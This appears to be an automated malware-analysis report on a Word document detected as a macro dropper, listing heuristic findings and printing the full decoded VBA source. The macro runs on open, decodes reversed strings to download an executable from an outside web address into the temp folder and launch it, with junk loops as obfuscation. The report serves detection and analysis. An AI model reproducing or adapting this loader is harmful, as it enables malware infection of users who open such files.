MALICIOUS
266
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample contains heavily obfuscated VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to download a payload from the reconstructed URL 'http://uratilimg.or.sj/nib/exe.fsdGHi' and likely uses the string 'noitacilppa.llehS' (Shell application) to execute it. The presence of CreateObject and Environ() calls further supports the payload execution and potential information gathering.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-1616871 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1616871
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set NUIHusdfsd = CreateObject(SrpQPF(I7Av)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set NUIHusdfsd = CreateObject(SrpQPF(I7Av)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
pHUIisdf.Open Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9498 bytes |
SHA-256: b064ea8189b9adf7fe1412d1a0cf89b69aed6c806876b28b6a8396bcd6c90923 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
62 of 115 identifiers look randomly generated (e.g. 'YuGUCTFJYVPifB') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const n2EsR = "exe.fsdGHi\"
Private Const QVWdP = "PMET"
Private Const URkPCd0U4a = "exe.nib/sj/or.emoh.uratilimg.www//:ptth"
Private Const ZCmjC6En6E = n2EsR
Private Const U0G5AN6C1IZ = QVWdP
Private Const AK2awpFLc = "noitacilppa.llehS"
Private Const l4qPvk = ""
Private Const VTtsivoEya = "TEG"
Private Const I7Av = "PTTHLMX.2LMXSM"
Sub dsfsdwer()
werwersfdf
Dim LyCcPNHa As Integer
LyCcPNHa = 667
Do While LyCcPNHa < 667 + 10
LyCcPNHa = LyCcPNHa + 1: DoEvents
Loop
Dim uOrwJGp As Integer
uOrwJGp = 1231
Do While uOrwJGp < 1231 + 10
uOrwJGp = uOrwJGp + 1: DoEvents
Loop
End Sub
Sub AutoOpen()
dsfsdwer
Dim EUYbSrUzjfTo As Integer
For EUYbSrUzjfTo = 973 To 973 + 5
DoEvents
Next EUYbSrUzjfTo
Dim uBgssHL As Integer
uBgssHL = 1286
Do While uBgssHL < 1286 + 10
uBgssHL = uBgssHL + 1: DoEvents
Loop
End Sub
Sub Workbook_Open()
dsfsdwer
Dim VRRQUGz As Integer
VRRQUGz = 141
Do While VRRQUGz < 141 + 10
VRRQUGz = VRRQUGz + 1: DoEvents
Loop
Dim UdSyHHGLipw As Integer
For UdSyHHGLipw = 1811 To 1811 + 5
DoEvents
Next UdSyHHGLipw
End Sub
Function FRkfhy(ByVal vWebFile As String, ByVal pNJKBjkdsf As String) As Boolean
Dim dJSAYGtdSR As Long, GYUbjsdf As Long, oJhuidsf() As Byte
Dim rfdQp As Integer
rfdQp = 1636
Do While rfdQp < 1636 + 10
rfdQp = rfdQp + 1: DoEvents
Loop
Dim RfSFgCBd As Integer
For RfSFgCBd = 1319 To 1319 + 5
DoEvents
Next RfSFgCBd
Dim aIwRH As Integer
For aIwRH = 586 To 586 + 5
DoEvents
Next aIwRH
Dim RxGGF As Integer
For RxGGF = 1168 To 1168 + 5
DoEvents
Next RxGGF
Dim sDxPyUEPVRd As Integer
For sDxPyUEPVRd = 1313 To 1313 + 5
DoEvents
Next sDxPyUEPVRd
Dim kCzQsQQ As Integer
For kCzQsQQ = 395 To 395 + 5
DoEvents
Next kCzQsQQ
Set NUIHusdfsd = CreateObject(SrpQPF(I7Av))
Dim EQwQic As Integer
EQwQic = 512
Do While EQwQic < 512 + 10
EQwQic = EQwQic + 1: DoEvents
Loop
Dim YuGUCTFJYVPifB As Integer
YuGUCTFJYVPifB = 2060
Do While YuGUCTFJYVPifB < 2060 + 10
YuGUCTFJYVPifB = YuGUCTFJYVPifB + 1: DoEvents
Loop
NUIHusdfsd.Open SrpQPF(VTtsivoEya), vWebFile, False
Dim bTEmoIlqDA As Integer
For bTEmoIlqDA = 942 To 942 + 5
DoEvents
Next bTEmoIlqDA
Dim iZPdoQVJvQt As Integer
iZPdoQVJvQt = 1413
Do While iZPdoQVJvQt < 1413 + 10
iZPdoQVJvQt = iZPdoQVJvQt + 1: DoEvents
Loop
NUIHusdfsd.Send
Dim pmUiH As Integer
pmUiH = 324
Do While pmUiH < 324 + 10
pmUiH = pmUiH + 1: DoEvents
Loop
Dim zTJAOZHHuh As Integer
zTJAOZHHuh = 2123
Do While zTJAOZHHuh < 2123 + 10
zTJAOZHHuh = zTJAOZHHuh + 1: DoEvents
Loop
Dim HkoCyhv As Integer
For HkoCyhv = 316 To 316 + 5
DoEvents
Next HkoCyhv
Dim hQNcmUUHuU As Integer
hQNcmUUHuU = 371
Do While hQNcmUUHuU < 371 + 10
hQNcmUUHuU = hQNcmUUHuU + 1: DoEvents
Loop
Dim ADGyYm As Integer
For ADGyYm = 1918 To 1918 + 5
DoEvents
Next ADGyYm
Dim mPueaOjaPeo As Integer
mPueaOjaPeo = 1860
Do While mPueaOjaPeo < 1860 + 10
mPueaOjaPeo = mPueaOjaPeo + 1: DoEvents
Loop
Dim UyLKbfhZyNF As Integer
UyLKbfhZyNF = 551
Do While UyLKbfhZyNF < 551 + 10
UyLKbfhZyNF = UyLKbfhZyNF + 1: DoEvents
Loop
Dim bVQUaKDK As Integer
bVQUaKDK = 23
Do While bVQUaKDK < 23 + 10
bVQUaKDK = bVQUaKDK + 1: DoEvents
Loop
oJhuidsf = NUIHusdfsd.responseBody
Dim JSrmOQxRQfUA As Integer
JSrmOQxRQfUA = 461
Do While JSrmOQxRQfUA < 461 + 10
JSrmOQxRQfUA = JSrmOQxRQfUA + 1: DoEvents
Loop
Dim AkuAwIJfgpNu As Integer
For AkuAwIJfgpNu = 977 To 977 + 5
DoEvents
Next AkuAwIJfgpNu
Dim QpmIf As Integer
QpmIf = 336
Do While QpmIf < 336 + 10
QpmIf = QpmIf + 1: DoEvents
Loop
Dim FgpBexcAS As Integer
FgpBexcAS = 83
Do While FgpBexcAS < 83 + 10
FgpBexcAS = FgpBexcAS + 1: DoEvents
Loop
Dim SEIjJUOhe As Integer
SEIjJUOhe = 253
Do While SEIjJUOhe < 253 + 10
SEIjJUOhe = SEIjJUOhe + 1: DoEvents
Loop
Dim SQynHyp As Integer
SQynHyp = 1353
Do While SQynHyp < 1353 + 10
SQynHyp = SQynHyp + 1: DoEvents
Loop
GYUbjsdf = FreeFile
Dim kCQqkaFOPNSD As Integer
For kCQqkaFOPNSD = 1839 To 1839 + 5
DoEvents
Next kCQqkaFOPNSD
Dim pAFCNftBC As Integer
For pAFCNftBC = 2150 To 2150 + 5
DoEvents
Next pAFCNftBC
If Dir(pNJKBjkdsf) <> "" Then Kill pNJKBjkdsf
Dim uLxBbPMGZVt As Integer
For uLxBbPMGZVt = 1955 To 1955 + 5
DoEvents
Next uLxBbPMGZVt
Dim fHMaQFSssT As Integer
fHMaQFSssT = 764
Do While fHMaQFSssT < 764 + 10
fHMaQFSssT = fHMaQFSssT + 1: DoEvents
Loop
Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
Dim orjIlP As Integer
orjIlP = 156
Do While orjIlP < 156 + 10
orjIlP = orjIlP + 1: DoEvents
Loop
Dim txArQ As Integer
For txArQ = 2127 To 2127 + 5
DoEvents
Next txArQ
Put #GYUbjsdf, , oJhuidsf
Dim OGgInYSHcS As Integer
OGgInYSHcS = 2321
Do While OGgInYSHcS < 2321 + 10
OGgInYSHcS = OGgInYSHcS + 1: DoEvents
Loop
Dim JidFHoINV As Integer
JidFHoINV = 100
Do While JidFHoINV < 100 + 10
JidFHoINV = JidFHoINV + 1: DoEvents
Loop
Close #GYUbjsdf
Dim CfvciBJyfaaZ As Integer
For CfvciBJyfaaZ = 443 To 443 + 5
DoEvents
Next CfvciBJyfaaZ
Dim GnHMUKqzz As Integer
For GnHMUKqzz = 2113 To 2113 + 5
DoEvents
Next GnHMUKqzz
Dim RPmVgmiuL As Integer
RPmVgmiuL = 1353
Do While RPmVgmiuL < 1353 + 10
RPmVgmiuL = RPmVgmiuL + 1: DoEvents
Loop
Dim iviUvRQtbse As Integer
iviUvRQtbse = 19
Do While iviUvRQtbse < 19 + 10
iviUvRQtbse = iviUvRQtbse + 1: DoEvents
Loop
Set NUIHusdfsd = Nothing
Dim DrrRbnPjO As Integer
DrrRbnPjO = 915
Do While DrrRbnPjO < 915 + 10
DrrRbnPjO = DrrRbnPjO + 1: DoEvents
Loop
Dim jcMuwQtyLVrE As Integer
For jcMuwQtyLVrE = 2400 To 2400 + 5
DoEvents
Next jcMuwQtyLVrE
Dim pHUIisdf As Object
Dim MPHgJomTIdSJ As Integer
MPHgJomTIdSJ = 301
Do While MPHgJomTIdSJ < 301 + 10
MPHgJomTIdSJ = MPHgJomTIdSJ + 1: DoEvents
Loop
Dim eVvKC As Integer
eVvKC = 1379
Do While eVvKC < 1379 + 10
eVvKC = eVvKC + 1: DoEvents
Loop
Set pHUIisdf = CreateObject(SrpQPF(AK2awpFLc))
Dim dtjme As Integer
dtjme = 330
Do While dtjme < 330 + 10
dtjme = dtjme + 1: DoEvents
Loop
Dim sCYlZ As Integer
For sCYlZ = 317 To 317 + 5
DoEvents
Next sCYlZ
pHUIisdf.Open Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E)
Dim BaDigNCQNE As Integer
BaDigNCQNE = 1956
Do While BaDigNCQNE < 1956 + 10
BaDigNCQNE = BaDigNCQNE + 1: DoEvents
Loop
Dim xhORmOShr As Integer
For xhORmOShr = 947 To 947 + 5
DoEvents
Next xhORmOShr
End Function
Sub werwersfdf()
Dim qvgnuKl As Integer
For qvgnuKl = 172 To 172 + 5
DoEvents
Next qvgnuKl
Dim hQyBVyC As Integer
hQyBVyC = 2326
Do While hQyBVyC < 2326 + 10
hQyBVyC = hQyBVyC + 1: DoEvents
Loop
HUIBuerwfds = SrpQPF(URkPCd0U4a)
Dim LlNsqYMhYOcn As Integer
LlNsqYMhYOcn = 2253
Do While LlNsqYMhYOcn < 2253 + 10
LlNsqYMhYOcn = LlNsqYMhYOcn + 1: DoEvents
Loop
Dim vQeQDe As Integer
vQeQDe = 108
Do While vQeQDe < 108 + 10
vQeQDe = vQeQDe + 1: DoEvents
Loop
FRkfhy HUIBuerwfds, Environ(SrpQPF(U0G5AN6C1IZ)) & SrpQPF(ZCmjC6En6E)
Dim dTisbbN As Integer
dTisbbN = 778
Do While dTisbbN < 778 + 10
dTisbbN = dTisbbN + 1: DoEvents
Loop
Dim aBYVygx As Integer
aBYVygx = 770
Do While aBYVygx < 770 + 10
aBYVygx = aBYVygx + 1: DoEvents
Loop
Dim hjbAdHF As Integer
For hjbAdHF = 345 To 345 + 5
DoEvents
Next hjbAdHF
Dim vowanmCGIA As Integer
vowanmCGIA = 1191
Do While vowanmCGIA < 1191 + 10
vowanmCGIA = vowanmCGIA + 1: DoEvents
Loop
End Sub
Function SrpQPF(sstring As String) As String
Dim aKRZpPPfUYPo As Integer
aKRZpPPfUYPo = 117
Do While aKRZpPPfUYPo < 117 + 10
aKRZpPPfUYPo = aKRZpPPfUYPo + 1: DoEvents
Loop
Dim JSdYBQjDQQ As Integer
For JSdYBQjDQQ = 1407 To 1407 + 5
DoEvents
Next JSdYBQjDQQ
Dim WF5OIEHGvMF As Long
Dim eEPJcLiRd As Integer
For eEPJcLiRd = 647 To 647 + 5
DoEvents
Next eEPJcLiRd
Dim osRFDxPMj As Integer
For osRFDxPMj = 2134 To 2134 + 5
DoEvents
Next osRFDxPMj
For WF5OIEHGvMF = 0 To Len(sstring) - 1
Dim yjQSnPUifN As Integer
For yjQSnPUifN = 1763 To 1763 + 5
DoEvents
Next yjQSnPUifN
Dim ilogEiMxshB As Integer
For ilogEiMxshB = 137 To 137 + 5
DoEvents
Next ilogEiMxshB
If Len(sstring) > 0 Then
Dim SqwEivuKOQI As Integer
SqwEivuKOQI = 1663
Do While SqwEivuKOQI < 1663 + 10
SqwEivuKOQI = SqwEivuKOQI + 1: DoEvents
Loop
Dim LELqQ As Integer
LELqQ = 1374
Do While LELqQ < 1374 + 10
LELqQ = LELqQ + 1: DoEvents
Loop
SrpQPF = SrpQPF & Right(sstring, 1)
Dim GeZCDkEJ As Integer
GeZCDkEJ = 1490
Do While GeZCDkEJ < 1490 + 10
GeZCDkEJ = GeZCDkEJ + 1: DoEvents
Loop
Dim OyIOKQo As Integer
For OyIOKQo = 861 To 861 + 5
DoEvents
Next OyIOKQo
sstring = Left(sstring, Len(sstring) - 1)
Dim gHedEmDp As Integer
gHedEmDp = 1946
Do While gHedEmDp < 1946 + 10
gHedEmDp = gHedEmDp + 1: DoEvents
Loop
Dim IQeFaE As Integer
For IQeFaE = 1438 To 1438 + 5
DoEvents
Next IQeFaE
End If
Dim FeVReu As Integer
FeVReu = 1380
Do While FeVReu < 1380 + 10
FeVReu = FeVReu + 1: DoEvents
Loop
Dim IbYvfpvrDTU As Integer
IbYvfpvrDTU = 1687
Do While IbYvfpvrDTU < 1687 + 10
IbYvfpvrDTU = IbYvfpvrDTU + 1: DoEvents
Loop
Next WF5OIEHGvMF
Dim vQEVHLmM As Integer
For vQEVHLmM = 2358 To 2358 + 5
DoEvents
Next vQEVHLmM
Dim iBhFQjQUOh As Integer
For iBhFQjQUOh = 1573 To 1573 + 5
DoEvents
Next iBhFQjQUOh
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.